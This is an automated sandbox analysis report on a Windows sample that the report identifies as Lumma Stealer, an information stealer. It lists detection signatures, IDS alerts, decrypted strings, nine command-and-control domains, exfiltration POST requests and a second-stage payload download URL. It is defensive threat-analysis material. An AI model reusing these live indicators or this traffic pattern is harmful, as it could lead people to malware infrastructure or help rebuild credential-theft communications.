Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mG83m82qhF.exe

Overview

General Information

Sample name:mG83m82qhF.exe
renamed because original name is a hash value
Original sample name:b51d856b18ecfad7b127881f7819409b.exe
Analysis ID:1579750
MD5:b51d856b18ecfad7b127881f7819409b
SHA1:61365a9f474ed89cc6bcc45bd08355a381cacb85
SHA256:663a74437e86b0bf7008ac4438821bf6c2adc65abf946b81014649a2fc23d294
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • mG83m82qhF.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\mG83m82qhF.exe" MD5: B51D856B18ECFAD7B127881F7819409B)
    • WerFault.exe (PID: 1472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7704 -s 2040 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["steppriflej.xyz", "supporse-comment.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou", "cuddlyready.xyz", "greywe-snotty.cyou", "ripe-blade.cyou"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1426197522.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1455318191.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.1454724980.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.1456122443.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.1452173526.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 23 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:31:24.358092+010020283713Unknown Traffic192.168.2.1049709172.67.150.173443TCP
                2024-12-23T08:31:26.603782+010020283713Unknown Traffic192.168.2.1049715172.67.150.173443TCP
                2024-12-23T08:31:29.217430+010020283713Unknown Traffic192.168.2.1049721172.67.150.173443TCP
                2024-12-23T08:31:31.800217+010020283713Unknown Traffic192.168.2.1049727172.67.150.173443TCP
                2024-12-23T08:31:34.383974+010020283713Unknown Traffic192.168.2.1049733172.67.150.173443TCP
                2024-12-23T08:31:37.289695+010020283713Unknown Traffic192.168.2.1049741172.67.150.173443TCP
                2024-12-23T08:31:39.873395+010020283713Unknown Traffic192.168.2.1049752172.67.150.173443TCP
                2024-12-23T08:31:45.261319+010020283713Unknown Traffic192.168.2.1049763172.67.150.173443TCP
                2024-12-23T08:31:47.601922+010020283713Unknown Traffic192.168.2.1049769185.166.143.49443TCP
                2024-12-23T08:31:50.046654+010020283713Unknown Traffic192.168.2.104977552.217.136.89443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:31:25.370653+010020546531A Network Trojan was detected192.168.2.1049709172.67.150.173443TCP
                2024-12-23T08:31:27.384459+010020546531A Network Trojan was detected192.168.2.1049715172.67.150.173443TCP
                2024-12-23T08:31:46.020963+010020546531A Network Trojan was detected192.168.2.1049763172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:31:25.370653+010020498361A Network Trojan was detected192.168.2.1049709172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:31:27.384459+010020498121A Network Trojan was detected192.168.2.1049715172.67.150.173443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-23T08:31:38.056395+010020480941Malware Command and Control Activity Detected192.168.2.1049741172.67.150.173443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: mG83m82qhF.exeAvira: detected
                Source: mG83m82qhF.exe.7704.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["steppriflej.xyz", "supporse-comment.cyou", "hosue-billowy.cyou", "smash-boiling.cyou", "sendypaster.xyz", "pollution-raker.cyou", "cuddlyready.xyz", "greywe-snotty.cyou", "ripe-blade.cyou"], "Build id": "LOGS11--LiveTraffic"}
                Source: mG83m82qhF.exeVirustotal: Detection: 54%Perma Link
                Source: mG83m82qhF.exeReversingLabs: Detection: 63%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: mG83m82qhF.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: pollution-raker.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: hosue-billowy.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: ripe-blade.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: smash-boiling.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: supporse-comment.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: greywe-snotty.cyou
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: steppriflej.xyz
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: sendypaster.xyz
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: cuddlyready.xyz
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
                Source: mG83m82qhF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.10:49763 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.10:49769 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.136.89:443 -> 192.168.2.10:49775 version: TLS 1.2
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: number of queries: 1001

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.10:49715 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49715 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.10:49741 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49709 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49709 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49763 -> 172.67.150.173:443
                Source: Malware configuration extractorURLs: steppriflej.xyz
                Source: Malware configuration extractorURLs: supporse-comment.cyou
                Source: Malware configuration extractorURLs: hosue-billowy.cyou
                Source: Malware configuration extractorURLs: smash-boiling.cyou
                Source: Malware configuration extractorURLs: sendypaster.xyz
                Source: Malware configuration extractorURLs: pollution-raker.cyou
                Source: Malware configuration extractorURLs: cuddlyready.xyz
                Source: Malware configuration extractorURLs: greywe-snotty.cyou
                Source: Malware configuration extractorURLs: ripe-blade.cyou
                Source: DNS query: cuddlyready.xyz
                Source: Joe Sandbox ViewIP Address: 172.67.150.173 172.67.150.173
                Source: Joe Sandbox ViewIP Address: 185.166.143.49 185.166.143.49
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49709 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49733 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49727 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49715 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49741 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49769 -> 185.166.143.49:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49775 -> 52.217.136.89:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49721 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49763 -> 172.67.150.173:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49752 -> 172.67.150.173:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K9DFO6OSNV4Y2XTIIPMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12859Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2NP6G25QLXUCTB6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15062Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=O1N2OO66DWA6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20406Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZZ2FAQATDR3FX5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1246Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DDNDLNQIKLUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571289Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: cuddlyready.xyz
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWou94jMnJQS46uxs8Ju0vMuJyGP%2Fm9Pv%2B9rjrr05WMtHqBeTOTzNjsGoj1w1XCAbwY%2BnCJke6mWUvmJDQV3UNFoIj5wrOU9N8KG52Lv2DH29Pc9SsXP5V94voMaRUXiGGyyEAt59t0%2B4Q%3D%3D&Expires=1734940312 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
                Source: global trafficHTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNMBRFAF7J&Signature=ElXwI1uM9Ngc%2BxuaSBlHwwNoUyU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJGMEQCIHFOadXW96s%2F6j%2B9%2F1qDLQ%2FVQjzT09CNZEl0KSalnReRAiAVIR6CkmJv752IfTGhHrBu8MVl8HXgzVXeJarf7U6uNSqwAgjQ%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMf3beE4TDGTWAxXf7KoQCCIVDIy89MY1SXcPhKyZL9lBg2pPZBxGCmrKICNGJ6h%2FheqsMKqBW6WUKyqApzTtXVRvVE3dkKIriK7OXdMRoJA1PBz6Y%2F0ZILj1MBXZfy4lo4f61H1yCCnaEG%2Fh3DETN5htpaDQpLxXWVQJDJzKFObJg08IFnpVPlJsXAqMn5fWRZiWzPmaYZTjgi%2BXeY8QwxS1jq%2FTwH6nzn0tPIh68O5rH%2Bg66d%2BvvxT7oS3fmc1Ql1PauHEt5IvtcYVMLd4gFlgEfHROLI%2BSx8Ci0F%2Fod3LbBg6KjtMraiqskzv135yY7nh4blgqoJis6ekwpCZAv3MjVYedHhTOMz9L%2BNtqonsiE6H0wkJ%2BkuwY6ngGK60xTwJ8GaP00JfvV8zmzgbazl0vd1R%2FI8BE8GI%2FQizEzV1tvLyuVn8O%2Bjv3TQy2op987XWou94jMnJQS46uxs8Ju0vMuJyGP%2Fm9Pv%2B9rjrr05WMtHqBeTOTzNjsGoj1w1XCAbwY%2BnCJke6mWUvmJDQV3UNFoIj5wrOU9N8KG52Lv2DH29Pc9SsXP5V94voMaRUXiGGyyEAt59t0%2B4Q%3D%3D&Expires=1734940312 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: cuddlyready.xyz
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cuddlyready.xyz
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: mG83m82qhF.exe, 00000000.00000002.2008684160.0000000005959000.00000002.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.0000000005279000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609519898.00000000052B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: mG83m82qhF.exe, 00000000.00000003.1630361476.0000000005275000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: mG83m82qhF.exe, 00000000.00000002.2008127945.0000000005274000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000002.2005523294.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
